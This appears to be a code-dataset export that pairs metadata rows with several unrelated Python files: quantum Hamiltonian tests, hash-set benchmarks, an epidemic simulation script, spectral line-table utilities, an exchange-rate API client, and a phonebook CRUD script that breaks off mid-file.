| 34.895349 | 105 | 0.676774 | 374 | 3,001 | 5.179144 | 0.248663 | 0.025813 | 0.036138 | 0.03872 | 0.416107 | 0.353123 | 0.320083 | 0.278782 | 0.278782 | 0.278782 | 0 | 0.012697 | 0.23892 | 3,001 | 85 | 106 | 35.305882 | 0.835377 | 0.063979 | 0 | 0.214286 | 0 | 0 | 0.046362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.071429 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393450fc2d2715e9100e072a54294b73919a49e9 | 11,446 | py | Python | src/qibo/tests/test_core_hamiltonians.py | renatomello/qibo | 20c6f3f22effbeccd5d31ed456717f9bee449e0c | [
"Apache-2.0"
] | null | null | null | src/qibo/tests/test_core_hamiltonians.py | renatomello/qibo | 20c6f3f22effbeccd5d31ed456717f9bee449e0c | [
"Apache-2.0"
] | null | null | null | src/qibo/tests/test_core_hamiltonians.py | renatomello/qibo | 20c6f3f22effbeccd5d31ed456717f9bee449e0c | [
"Apache-2.0"
] | 1 | 2022-03-28T17:52:46.000Z | 2022-03-28T17:52:46.000Z | """Test methods in `qibo/core/hamiltonians.py`."""
import pytest
import numpy as np
from scipy import sparse
from qibo import hamiltonians, K
from qibo.tests.utils import random_complex
def random_sparse_matrix(n, sparse_type=None):
if K.name in ("qibotf", "tensorflow"):
nonzero = int(0.1 * n * n)
indices = np.random.randint(0, n, size=(nonzero, 2))
data = np.random.random(nonzero) + 1j * np.random.random(nonzero)
data = K.cast(data)
return K.sparse.SparseTensor(indices, data, (n, n))
else:
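        # scipy's sparse.rand defaults to ~1% density, sparser than the
        # explicit 10% nonzero count used for the tensorflow backends above.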
re = sparse.rand(n, n, format=sparse_type)
im = sparse.rand(n, n, format=sparse_type)
return re + 1j * im
def test_hamiltonian_init():
with pytest.raises(TypeError):
H = hamiltonians.Hamiltonian(2, "test")
    H1 = hamiltonians.Hamiltonian(2, np.eye(4))
    H1 = hamiltonians.Hamiltonian(2, K.eye(4))
with pytest.raises(ValueError):
H1 = hamiltonians.Hamiltonian(-2, np.eye(4))
with pytest.raises(RuntimeError):
H2 = hamiltonians.Hamiltonian(np.eye(2), np.eye(4))
with pytest.raises(ValueError):
H3 = hamiltonians.Hamiltonian(4, np.eye(10))
@pytest.mark.parametrize("dtype", K.numeric_types)
@pytest.mark.parametrize("sparse_type", [None, "coo", "csr", "csc", "dia"])
def test_hamiltonian_algebraic_operations(dtype, sparse_type):
"""Test basic hamiltonian overloading."""
def transformation_a(a, b):
c1 = dtype(0.1)
return a + c1 * b
def transformation_b(a, b):
c1 = dtype(2)
c2 = dtype(3.5)
return c1 * a - b * c2
def transformation_c(a, b, use_eye=False):
c1 = dtype(4.5)
if use_eye:
return a + c1 * np.eye(a.shape[0]) - b
else:
return a + c1 - b
def transformation_d(a, b, use_eye=False):
c1 = dtype(10.5)
c2 = dtype(2)
if use_eye:
return c1 * np.eye(a.shape[0]) - a + c2 * b
else:
return c1 - a + c2 * b
if sparse_type is None:
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5)
H2 = hamiltonians.XXZ(nqubits=2, delta=1)
mH1, mH2 = K.to_numpy(H1.matrix), K.to_numpy(H2.matrix)
else:
mH1 = sparse.rand(64, 64, format=sparse_type)
mH2 = sparse.rand(64, 64, format=sparse_type)
H1 = hamiltonians.Hamiltonian(6, mH1)
H2 = hamiltonians.Hamiltonian(6, mH2)
hH1 = transformation_a(mH1, mH2)
hH2 = transformation_b(mH1, mH2)
hH3 = transformation_c(mH1, mH2, use_eye=True)
hH4 = transformation_d(mH1, mH2, use_eye=True)
HT1 = transformation_a(H1, H2)
HT2 = transformation_b(H1, H2)
HT3 = transformation_c(H1, H2)
HT4 = transformation_d(H1, H2)
K.assert_allclose(hH1, HT1.matrix)
K.assert_allclose(hH2, HT2.matrix)
K.assert_allclose(hH3, HT3.matrix)
K.assert_allclose(hH4, HT4.matrix)
@pytest.mark.parametrize("sparse_type", [None, "coo", "csr", "csc", "dia"])
def test_hamiltonian_addition(sparse_type):
if sparse_type is None:
H1 = hamiltonians.Y(nqubits=3)
H2 = hamiltonians.TFIM(nqubits=3, h=1.0)
else:
H1 = hamiltonians.Hamiltonian(6, sparse.rand(64, 64, format=sparse_type))
H2 = hamiltonians.Hamiltonian(6, sparse.rand(64, 64, format=sparse_type))
H = H1 + H2
matrix = H1.matrix + H2.matrix
K.assert_allclose(H.matrix, matrix)
H = H1 - 0.5 * H2
matrix = H1.matrix - 0.5 * H2.matrix
K.assert_allclose(H.matrix, matrix)
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5)
H2 = hamiltonians.XXZ(nqubits=3, delta=0.1)
with pytest.raises(RuntimeError):
R = H1 + H2
with pytest.raises(RuntimeError):
R = H1 - H2
def test_hamiltonian_operation_errors():
"""Testing hamiltonian not implemented errors."""
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5)
H2 = hamiltonians.XXZ(nqubits=2, delta=0.1)
with pytest.raises(NotImplementedError):
R = H1 * H2
with pytest.raises(NotImplementedError):
R = H1 + "a"
with pytest.raises(NotImplementedError):
R = H2 - (2,)
with pytest.raises(NotImplementedError):
R = [3] - H1
@pytest.mark.parametrize("sparse_type", [None, "coo", "csr", "csc", "dia"])
def test_hamiltonian_matmul(backend, sparse_type):
"""Test matrix multiplication between Hamiltonians."""
if sparse_type is None:
nqubits = 3
H1 = hamiltonians.TFIM(nqubits, h=1.0)
H2 = hamiltonians.Y(nqubits)
else:
nqubits = 5
nstates = 2 ** nqubits
H1 = hamiltonians.Hamiltonian(nqubits, random_sparse_matrix(nstates, sparse_type))
H2 = hamiltonians.Hamiltonian(nqubits, random_sparse_matrix(nstates, sparse_type))
m1 = K.to_numpy(H1.matrix)
m2 = K.to_numpy(H2.matrix)
if K.name in ("qibotf", "tensorflow") and sparse_type is not None:
with pytest.raises(NotImplementedError):
_ = H1 @ H2
else:
K.assert_allclose((H1 @ H2).matrix, m1 @ m2)
K.assert_allclose((H2 @ H1).matrix, m2 @ m1)
with pytest.raises(ValueError):
H1 @ np.zeros(3 * (2 ** nqubits,), dtype=m1.dtype)
with pytest.raises(NotImplementedError):
H1 @ 2
@pytest.mark.parametrize("sparse_type", [None, "coo", "csr", "csc", "dia"])
def test_hamiltonian_matmul_states(backend, sparse_type):
"""Test matrix multiplication between Hamiltonian and states."""
if sparse_type is None:
nqubits = 3
H = hamiltonians.TFIM(nqubits, h=1.0)
else:
nqubits = 5
nstates = 2 ** nqubits
H = hamiltonians.Hamiltonian(nqubits, random_sparse_matrix(nstates, sparse_type))
hm = K.to_numpy(H.matrix)
v = random_complex(2 ** nqubits, dtype=hm.dtype)
m = random_complex((2 ** nqubits, 2 ** nqubits), dtype=hm.dtype)
Hv = H @ K.cast(v)
Hm = H @ K.cast(m)
K.assert_allclose(Hv, hm.dot(v))
K.assert_allclose(Hm, hm @ m)
from qibo.core.states import VectorState
Hstate = H @ VectorState.from_tensor(K.cast(v))
K.assert_allclose(Hstate, hm.dot(v))
@pytest.mark.parametrize("density_matrix", [True, False])
@pytest.mark.parametrize("sparse_type,dense",
[(None, True), (None, False),
("coo", True), ("csr", True),
("csc", True), ("dia", True)])
def test_hamiltonian_expectation(backend, dense, density_matrix, sparse_type):
"""Test Hamiltonian expectation value calculation."""
if sparse_type is None:
h = hamiltonians.XXZ(nqubits=3, delta=0.5, dense=dense)
else:
h = hamiltonians.Hamiltonian(6, random_sparse_matrix(64, sparse_type))
matrix = K.to_numpy(h.matrix)
if density_matrix:
state = random_complex((2 ** h.nqubits, 2 ** h.nqubits))
state = state + state.T.conj()
norm = np.trace(state)
target_ev = np.trace(matrix.dot(state)).real
else:
state = random_complex(2 ** h.nqubits)
norm = np.sum(np.abs(state) ** 2)
target_ev = np.sum(state.conj() * matrix.dot(state)).real
K.assert_allclose(h.expectation(state), target_ev)
K.assert_allclose(h.expectation(state, True), target_ev / norm)
def test_hamiltonian_expectation_errors():
h = hamiltonians.XXZ(nqubits=3, delta=0.5)
state = random_complex((4, 4, 4))
with pytest.raises(ValueError):
h.expectation(state)
with pytest.raises(TypeError):
h.expectation("test")
@pytest.mark.parametrize("dtype", K.numeric_types)
@pytest.mark.parametrize("sparse_type,dense",
[(None, True), (None, False),
("coo", True), ("csr", True),
("csc", True), ("dia", True)])
def test_hamiltonian_eigenvalues(dtype, sparse_type, dense):
"""Testing hamiltonian eigenvalues scaling."""
if sparse_type is None:
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5, dense=dense)
else:
from scipy import sparse
H1 = hamiltonians.XXZ(nqubits=5, delta=0.5)
m = getattr(sparse, f"{sparse_type}_matrix")(K.to_numpy(H1.matrix))
H1 = hamiltonians.Hamiltonian(5, m)
H1_eigen = sorted(K.to_numpy(H1.eigenvalues()))
hH1_eigen = sorted(K.to_numpy(K.eigvalsh(H1.matrix)))
K.assert_allclose(sorted(H1_eigen), hH1_eigen)
c1 = dtype(2.5)
H2 = c1 * H1
H2_eigen = sorted(K.to_numpy(H2._eigenvalues))
hH2_eigen = sorted(K.to_numpy(K.eigvalsh(c1 * H1.matrix)))
K.assert_allclose(H2_eigen, hH2_eigen)
c2 = dtype(-11.1)
H3 = H1 * c2
if sparse_type is None:
H3_eigen = sorted(K.to_numpy(H3._eigenvalues))
hH3_eigen = sorted(K.to_numpy(K.eigvalsh(H1.matrix * c2)))
K.assert_allclose(H3_eigen, hH3_eigen)
else:
assert H3._eigenvalues is None
@pytest.mark.parametrize("dtype", K.numeric_types)
@pytest.mark.parametrize("dense", [True, False])
def test_hamiltonian_eigenvectors(dtype, dense):
"""Testing hamiltonian eigenvectors scaling."""
H1 = hamiltonians.XXZ(nqubits=2, delta=0.5, dense=dense)
V1 = K.to_numpy(H1.eigenvectors())
U1 = K.to_numpy(H1.eigenvalues())
K.assert_allclose(H1.matrix, V1 @ np.diag(U1) @ V1.T)
c1 = dtype(2.5)
H2 = c1 * H1
V2 = K.to_numpy(H2._eigenvectors)
U2 = K.to_numpy(H2._eigenvalues)
K.assert_allclose(H2.matrix, V2 @ np.diag(U2) @ V2.T)
c2 = dtype(-11.1)
H3 = H1 * c2
V3 = K.to_numpy(H3.eigenvectors())
U3 = K.to_numpy(H3._eigenvalues)
K.assert_allclose(H3.matrix, V3 @ np.diag(U3) @ V3.T)
c3 = dtype(0)
H4 = c3 * H1
V4 = K.to_numpy(H4._eigenvectors)
U4 = K.to_numpy(H4._eigenvalues)
K.assert_allclose(H4.matrix, V4 @ np.diag(U4) @ V4.T)
@pytest.mark.parametrize("sparse_type,dense",
[(None, True), (None, False),
("coo", True), ("csr", True),
("csc", True), ("dia", True)])
def test_hamiltonian_ground_state(sparse_type, dense):
"""Test Hamiltonian ground state."""
if sparse_type is None:
H = hamiltonians.XXZ(nqubits=2, delta=0.5, dense=dense)
else:
from scipy import sparse
H = hamiltonians.XXZ(nqubits=5, delta=0.5)
m = getattr(sparse, f"{sparse_type}_matrix")(K.to_numpy(H.matrix))
H = hamiltonians.Hamiltonian(5, m)
V = K.to_numpy(H.eigenvectors())
K.assert_allclose(H.ground_state(), V[:, 0])
@pytest.mark.parametrize("sparse_type,dense",
[(None, True), (None, False),
("coo", True), ("csr", True),
("csc", True), ("dia", True)])
def test_hamiltonian_exponentiation(sparse_type, dense):
"""Test matrix exponentiation of Hamiltonians ``exp(1j * t * H)``."""
from scipy.linalg import expm
def construct_hamiltonian():
if sparse_type is None:
return hamiltonians.XXZ(nqubits=2, delta=0.5, dense=dense)
else:
ham = hamiltonians.XXZ(nqubits=5, delta=0.5)
m = getattr(sparse, f"{sparse_type}_matrix")(K.to_numpy(ham.matrix))
return hamiltonians.Hamiltonian(5, m)
H = construct_hamiltonian()
target_matrix = expm(-0.5j * K.to_numpy(H.matrix))
K.assert_allclose(H.exp(0.5), target_matrix)
H = construct_hamiltonian()
_ = H.eigenvectors()
K.assert_allclose(H.exp(0.5), target_matrix)
| 35.880878 | 90 | 0.62441 | 1,570 | 11,446 | 4.428662 | 0.113376 | 0.057529 | 0.028765 | 0.018122 | 0.573278 | 0.477779 | 0.40069 | 0.319718 | 0.298289 | 0.236589 | 0 | 0.039634 | 0.235104 | 11,446 | 318 | 91 | 35.993711 | 0.75454 | 0.040014 | 0 | 0.366795 | 0 | 0 | 0.031361 | 0 | 0 | 0 | 0 | 0 | 0.092664 | 1 | 0.069498 | false | 0 | 0.034749 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39373fd62c1c95168677446d3aff06f09ea5b298 | 3,179 | py | Python | tests/asv_bench/benchmarks/count_if.py | realead/cykhash | b1a45843c3be49cd232d3c78315d2291a830284f | [
"MIT"
] | 18 | 2019-03-13T08:20:06.000Z | 2021-06-22T08:03:01.000Z | tests/asv_bench/benchmarks/count_if.py | realead/cykhash | b1a45843c3be49cd232d3c78315d2291a830284f | [
"MIT"
] | 6 | 2020-04-13T10:11:45.000Z | 2021-11-14T15:59:55.000Z | tests/asv_bench/benchmarks/count_if.py | realead/cykhash | b1a45843c3be49cd232d3c78315d2291a830284f | [
"MIT"
] | 7 | 2019-05-19T22:24:57.000Z | 2020-08-26T23:01:23.000Z | import numpy as np
from cykhash import count_if_int64, count_if_int64_from_iter, Int64Set_from, Int64Set_from_buffer
from cykhash import count_if_int32, count_if_int32_from_iter, Int32Set_from, Int32Set_from_buffer
from cykhash import count_if_float64, count_if_float64_from_iter, Float64Set_from, Float64Set_from_buffer
from cykhash import count_if_float32, count_if_float32_from_iter, Float32Set_from, Float32Set_from_buffer
from cykhash import count_if_pyobject, count_if_pyobject_from_iter, PyObjectSet_from, PyObjectSet_from_buffer
CREATE_SET={
np.float64 : Float64Set_from_buffer,
np.float32 : Float32Set_from_buffer,
np.int64 : Int64Set_from_buffer,
np.int32 : Int32Set_from_buffer,
}
COUNT_IF = {
np.float64 : count_if_float64,
np.float32 : count_if_float32,
np.int64 : count_if_int64,
np.int32 : count_if_int32,
}
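# Dispatch tables: each dtype maps to the matching cykhash set constructor
# (CREATE_SET) and membership-counting function (COUNT_IF) imported above.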
class CountIfObject:
def setup(self):
N=100_000
self.set = PyObjectSet_from(x<<32 for x in range(N))
np.random.seed(42)
        self.query = np.random.randint(0, N, N).astype(object)
def time_countif(self):
count_if_pyobject(self.query, self.set)
class CountIfSameLongTuple:
def setup(self):
t = tuple(range(1000))
self.set = PyObjectSet_from([t])
self.query = np.array(["a"] + [t]*1000)
def time_countif(self):
count_if_pyobject(self.query, self.set)
class CountIfArange:
params = [
[np.float64, np.float32, np.int64, np.int32],
[1_000, 2_000, 8_000, 10_000, 100_000, 1_000_000, 10_000_000, 100_000_000],
[-2, 0, 2]
]
param_names = ["dtype", "M", "offset_factor"]
def setup(self, dtype, M, offset_factor):
self.set = CREATE_SET[dtype](np.arange(M).astype(dtype))
offset = int(M*offset_factor)
N=10**6
np.random.seed(42)
self.query = np.random.randint(offset,M+offset,N).astype(dtype)
def time_countif(self, dtype, M, offset_factor):
COUNT_IF[dtype](self.query, self.set)
class CountIfRandomYes:
params = [
        [np.float64, np.float32, np.int64, np.int32],
[1_000, 2_000, 8_000, 10_000, 100_000, 1_000_000, 10_000_000, 100_000_000],
]
param_names = ["dtype", "M"]
def setup(self, dtype, M):
np.random.seed(42)
keys = (np.random.rand(M)*M).astype(dtype)
self.set = CREATE_SET[dtype](keys)
N=10**6
self.query = (np.random.rand(N)*M).astype(dtype)
def time_countif(self, dtype, M):
COUNT_IF[dtype](self.query, self.set)
class CountIfRandomNo:
params = [
        [np.float64, np.float32, np.int64, np.int32],
[1_000, 2_000, 8_000, 10_000, 100_000, 1_000_000, 10_000_000, 100_000_000],
]
param_names = ["dtype", "M"]
def setup(self, dtype, M):
np.random.seed(42)
keys = (np.random.rand(M)*M).astype(dtype)
self.set = CREATE_SET[dtype](keys)
N=10**6
self.query = (np.random.rand(N)*M+2*M).astype(dtype)
def time_countif(self, dtype, M):
COUNT_IF[dtype](self.query, self.set)
| 30.864078 | 110 | 0.643599 | 465 | 3,179 | 4.139785 | 0.150538 | 0.072727 | 0.024935 | 0.057143 | 0.581818 | 0.536623 | 0.536623 | 0.465974 | 0.428052 | 0.388571 | 0 | 0.109786 | 0.23498 | 3,179 | 102 | 111 | 31.166667 | 0.681743 | 0 | 0 | 0.460526 | 0 | 0 | 0.010079 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.131579 | false | 0 | 0.078947 | 0 | 0.355263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3938add8f52f37344b2c5a7d5cbf597b4f740a18 | 1,188 | py | Python | src/sim/06-allegheny-05-school-work-flu/sim-test-01.py | momacs/pram | d2de43ea447d13a65d814f781ec86889754f76fe | [
"BSD-3-Clause"
] | 10 | 2019-01-18T19:11:54.000Z | 2022-03-16T08:39:36.000Z | src/sim/06-allegheny-05-school-work-flu/sim-test-01.py | momacs/pram | d2de43ea447d13a65d814f781ec86889754f76fe | [
"BSD-3-Clause"
] | 2 | 2019-02-19T15:10:44.000Z | 2019-02-26T04:26:24.000Z | src/sim/06-allegheny-05-school-work-flu/sim-test-01.py | momacs/pram | d2de43ea447d13a65d814f781ec86889754f76fe | [
"BSD-3-Clause"
] | 3 | 2019-02-19T15:11:08.000Z | 2021-08-20T11:51:04.000Z | '''
A test simulation involving the SEIR flu model in isolation.
'''
from pram.data import GroupSizeProbe, ProbeMsgMode
from pram.entity import Group, Site
from pram.rule import SEIRFluRule
from pram.sim import Simulation
rand_seed = 1928
probe_grp_size_flu = GroupSizeProbe.by_attr('flu', SEIRFluRule.ATTR, SEIRFluRule.State, msg_mode=ProbeMsgMode.DISP, memo='Mass distribution across flu states')
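# Build and run the simulation with pram's fluent interface: seed the RNG,
# attach the SEIR flu rule and the probe above, create a group of 1000 agents,
# print a summary, run 16 iterations, compact, and print a final summary.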
(Simulation().
set().
rand_seed(rand_seed).
done().
add().
rule(SEIRFluRule()).
probe(probe_grp_size_flu).
done().
new_group(1000).
done().
summary(True, 0,0,0,0, (0,1)).
run(16).
compact().
summary(False, 8,0,0,0, (1,0))
)
# (Simulation().
# set().
# rand_seed(rand_seed).
# pragma_analyze(False).
# pragma_autocompact(True).
# done().
# add().
# rule(SEIRFluRule()).
# probe(probe_grp_size_flu).
# done().
# new_group(1000).
# done().
# run().summary(False, 8,0,0,0).
# run().summary(False, 8,0,0,0).
# run().summary(False, 8,0,0,0).
# run().summary(False, 8,0,0,0).
# run().summary(False, 8,0,0,0)
# )
| 24.75 | 159 | 0.590067 | 157 | 1,188 | 4.33758 | 0.356688 | 0.04699 | 0.039648 | 0.123348 | 0.43025 | 0.43025 | 0.321586 | 0.321586 | 0.321586 | 0.321586 | 0 | 0.051111 | 0.242424 | 1,188 | 47 | 160 | 25.276596 | 0.705556 | 0.422559 | 0 | 0.142857 | 0 | 0 | 0.057489 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.190476 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393d8a33f773b3b39e9d958ef90238b7ad2f9749 | 309 | py | Python | Apps/phsplunkoncall/splunkoncall_consts.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 74 | 2019-10-22T02:00:53.000Z | 2022-03-15T12:56:13.000Z | Apps/phsplunkoncall/splunkoncall_consts.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 375 | 2019-10-22T20:53:50.000Z | 2021-11-09T21:28:43.000Z | Apps/phsplunkoncall/splunkoncall_consts.py | ryanbsaunders/phantom-apps | 1befda793a08d366fbd443894f993efb1baf9635 | [
"Apache-2.0"
] | 175 | 2019-10-23T15:30:42.000Z | 2021-11-05T21:33:31.000Z | # File: splunkoncall_consts.py
#
# Copyright (c) 2018-2021 Splunk Inc.
#
# Licensed under Apache 2.0 (https://www.apache.org/licenses/LICENSE-2.0.txt)
#
# Define your constants here
INTEGRATION_URL_MISSING = "Integration URL required in asset configuration"
UPDATE_INCIDENT_ERROR = "Error updating incident"
| 28.090909 | 77 | 0.776699 | 43 | 309 | 5.465116 | 0.837209 | 0.017021 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044118 | 0.119741 | 309 | 10 | 78 | 30.9 | 0.819853 | 0.540453 | 0 | 0 | 0 | 0 | 0.522388 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393d8d7d5792eab89a415b922f64a52c86ec37a7 | 1,716 | py | Python | specreduce/table_utils.py | simontorres/specreduce | bb41c2d1416cb2fa1137f58643ddd9400a3092b9 | [
"BSD-3-Clause"
] | null | null | null | specreduce/table_utils.py | simontorres/specreduce | bb41c2d1416cb2fa1137f58643ddd9400a3092b9 | [
"BSD-3-Clause"
] | null | null | null | specreduce/table_utils.py | simontorres/specreduce | bb41c2d1416cb2fa1137f58643ddd9400a3092b9 | [
"BSD-3-Clause"
] | null | null | null | """Utility functions to parse master NIST table.
"""
from astropy.table import Table, vstack
import numpy as np
def sort_table_by_element(table, elem_list):
"""Build table based on list of elements
Parameters
----------
table: astropy table
Table to sort
elem_list: list
list of strings to sort table by
Returns
-------
element_filtered_table: astropytable
Filtered table based on inputs
"""
filtered_table_list = [table[np.where(table['Element'] == elem)] for elem in elem_list]
element_filtered_table = vstack(filtered_table_list)
return element_filtered_table
def sort_table_by_wavelength(table, min_wave, max_wave):
"""Build table off of wavelength ranges
Parameters
----------
min_wave: float
Lower bound wavelength to filter on
max_wave: float
Upper bound wavelength to filter on
Returns
-------
wave_filtered_table: astropytable
Filtered table based on inputs
"""
    assert min_wave < max_wave, "Minimum wavelength must be less than maximum wavelength."
wave_filtered_table = table[np.where((table['Wavelength'] >= min_wave) &
(table['Wavelength'] <= max_wave)
)]
return wave_filtered_table
def main():
"""A little example.
"""
t = Table.read('data/line_lists/NIST/NIST_combined.csv', format='csv')
elements = ['He I', 'Ne I', 'Ar I']
sorted_by_elem = sort_table_by_element(t, elements)
sorted_by_wave = sort_table_by_wavelength(t, 2000, 3000)
print(sorted_by_wave)
print(sorted_by_elem)
if __name__ == "__main__":
main()
| 26 | 91 | 0.643939 | 216 | 1,716 | 4.851852 | 0.347222 | 0.124046 | 0.052481 | 0.026718 | 0.145038 | 0.097328 | 0.097328 | 0.097328 | 0 | 0 | 0 | 0.00627 | 0.25641 | 1,716 | 65 | 92 | 26.4 | 0.815047 | 0.331002 | 0 | 0 | 0 | 0 | 0.13417 | 0.03668 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.136364 | false | 0 | 0.136364 | 0 | 0.363636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393e5bb1bc9612539e7d8b447c1f8d1b0ef109f0 | 1,223 | py | Python | AioCentralBankRuApi.py | dark0ghost/AioCentralBankRuApi | fcd9d0c9bc660c8e03c67d022398b51f47571720 | [
"MIT"
] | null | null | null | AioCentralBankRuApi.py | dark0ghost/AioCentralBankRuApi | fcd9d0c9bc660c8e03c67d022398b51f47571720 | [
"MIT"
] | null | null | null | AioCentralBankRuApi.py | dark0ghost/AioCentralBankRuApi | fcd9d0c9bc660c8e03c67d022398b51f47571720 | [
"MIT"
] | null | null | null | import aiohttp
from typing import Dict
class CenterBankApi:
"""
    Client for the Central Bank of Russia (CBR) daily exchange-rate API.
"""
def __init__(self, session: aiohttp.ClientSession) -> None:
self.link = "https://www.cbr-xml-daily.ru/daily_json.js"
self.obj = dict()
self.date: str = ""
self.session: aiohttp.ClientSession = session
async def get_json(self) -> Dict[str, Dict[str, str]]:
"""
        Fetch the daily rates JSON from https://www.cbr-xml-daily.ru/daily_json.js
        :return: parsed JSON response as a dictionary
"""
async with self.session.get(self.link) as response:
return await response.json(content_type=None, encoding="utf-8")
async def build_list_coin(self) -> Dict[str, Dict[str, str]]:
"""
        Build a currency dictionary from the fetched JSON.
        :return: mapping of currency code to its name and value
"""
response: Dict[str, Dict[str, str]] = await self.get_json()
self.date: str = response['Date']
for i in response["Valute"].items():
self.obj[i[0]] = {
"name": i[1]["Name"],
"valvue": i[1]["Value"]
}
return self.obj
def __len__(self) -> int:
"""
        Return the number of available currencies.
        :return: count of loaded currencies
"""
return len(self.obj)
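# Hedged usage sketch (an assumption, not part of the original module; it
# requires network access to cbr-xml-daily.ru):
if __name__ == '__main__':
    import asyncio
    async def demo():
        async with aiohttp.ClientSession() as session:
            api = CenterBankApi(session)
            rates = await api.build_list_coin()
            print(len(api), rates.get('USD'))
    asyncio.run(demo())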
| 27.177778 | 75 | 0.540474 | 148 | 1,223 | 4.364865 | 0.371622 | 0.065015 | 0.051084 | 0.065015 | 0.190402 | 0.164087 | 0.099071 | 0.099071 | 0.099071 | 0 | 0 | 0.004796 | 0.31807 | 1,223 | 44 | 76 | 27.795455 | 0.769784 | 0.048242 | 0 | 0 | 0 | 0 | 0.079332 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
393f1dae7f66e2378ca21c870e8999d47cde8d9f | 3,868 | py | Python | Sem-10-T2-Q5.py | daianasousa/Atividade-Remota-10 | 824ee93de32d7e93d836b1ac3b5b78eac8a2eea7 | [
"MIT"
] | null | null | null | Sem-10-T2-Q5.py | daianasousa/Atividade-Remota-10 | 824ee93de32d7e93d836b1ac3b5b78eac8a2eea7 | [
"MIT"
] | null | null | null | Sem-10-T2-Q5.py | daianasousa/Atividade-Remota-10 | 824ee93de32d7e93d836b1ac3b5b78eac8a2eea7 | [
"MIT"
] | null | null | null | agenda = {
'João': '86988102987',
}
# (C)RUD
def criar():
    # read the name
    nome = input('Name: ')
    # read the phone number and store it in a phone list
    telefone = [input('Phone number: ')]
    # pack name and phone list into a single variable
    lista = (nome, telefone)
    # add the contact to the dictionary, keyed by name
    codigo = nome
    agenda[codigo] = lista
    input('Record added. Press any key to continue...')
# C(R)UD
def ler(codigo):
    # load the record from the dictionary and unpack it
    nome, telefone = agenda[codigo]
    # return the unpacked values
    return nome, telefone
# CR(U)D
def atualizar(codigo):
    # load the contact identified by the key
    nome, telefone = ler(codigo)
    # read a new name into an auxiliary variable
    aux = input('New name: ')
    # if the value read is empty, keep the current name
    if aux != '':
        # a valid value was read, so update the name field
        nome = aux
    # reuse the auxiliary variable to read a phone number
    aux = input('New phone: ')
    # if the value read is empty, keep the current phone list
    if aux != '':
        # a valid phone was read; optionally append it to the list
        nova = input('Add phone? (Y, N): ')[0].upper() == 'Y'
        if nova:
            agenda[codigo][1].append(str(aux))
            print('Phone added successfully.')
        else:
            print('Phone not added.')
    # write the (possibly updated) record back to the dictionary
    agenda[codigo] = (nome, telefone)
    input('Record updated. Press any key to continue...')
# CRU(D)
def apagar(codigo):
    # load the record to be removed
    nome, telefone = ler(codigo)
    # ask the user to confirm the deletion
    confirma = input(f'Really delete {nome}? (Y, N): ')[0].upper() == 'Y'
    if confirma:
        # if confirmed, delete the record
        del agenda[codigo]
    input('Record deleted. Press any key to continue...')
def Agenda_telefonica():
    # print a listing of the whole phone book
    print('=' * 10, 'Listing the whole phone book', '=' * 10)
    qtd = 0
    # iterate over every key of the agenda dictionary
    for codigo in agenda:
        # read the record
        nome, telefone = ler(codigo)
        print('-' * 30)
        print(f'Name: {codigo}')
        # print the record's data
        print(f'Phone: {telefone}')
        qtd += 1
    if qtd == 0:
        print('<<< Nothing to show >>>')
    else:
        print(f'{qtd} names shown in the report.')
    print('=' * 10, 'End of phone book listing', '=' * 10)
    input('Press any key to continue...')
def menu():
